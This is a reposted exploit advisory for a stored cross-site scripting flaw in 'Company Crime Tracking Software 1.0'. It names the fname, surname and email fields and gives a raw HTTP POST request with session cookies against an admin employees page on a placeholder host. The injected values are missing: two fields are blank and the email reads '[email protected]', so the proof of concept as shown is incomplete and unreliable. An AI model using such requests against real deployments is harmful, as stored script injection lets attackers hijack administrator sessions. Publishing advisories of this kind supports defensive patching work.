Company Crime Tracking Software 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 2nd, 2021 📆 | 5893 Views ⚑

0

Company Crime Tracking Software 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Company Crime Tracknig Software | ‘fname,surname,email’ Stored Cross Site Scripting
# Exploit Author: Richard Jones
# Date: 01-04-2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12644/company-crime-tracking-system.html
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /caaz/admin/a_employees.php HTTP/1.1
Host: TARGET
Content-Type: multipart/form-data; boundary=—————————297905141828527091333499064608
Content-Length: 1010
Cookie: SSESSaca5a63f4c2fc739381fab7741d68783=xVaP07jLGdxx_p3Qsv1qO_3duBIN1XqSJKxxD4hJFkA; PHPSESSID=347sjf013j8s1blsuvsa32hr7r

—————– snip—————-
—————————–297905141828527091333499064608
Content-Disposition: form-data; name=”fname”


—————————–297905141828527091333499064608
Content-Disposition: form-data; name=”surname”


—————————–297905141828527091333499064608
Content-Disposition: form-data; name=”email”

[email protected]
—————– snip—————-

Source link

Tagged with:



Leave a Reply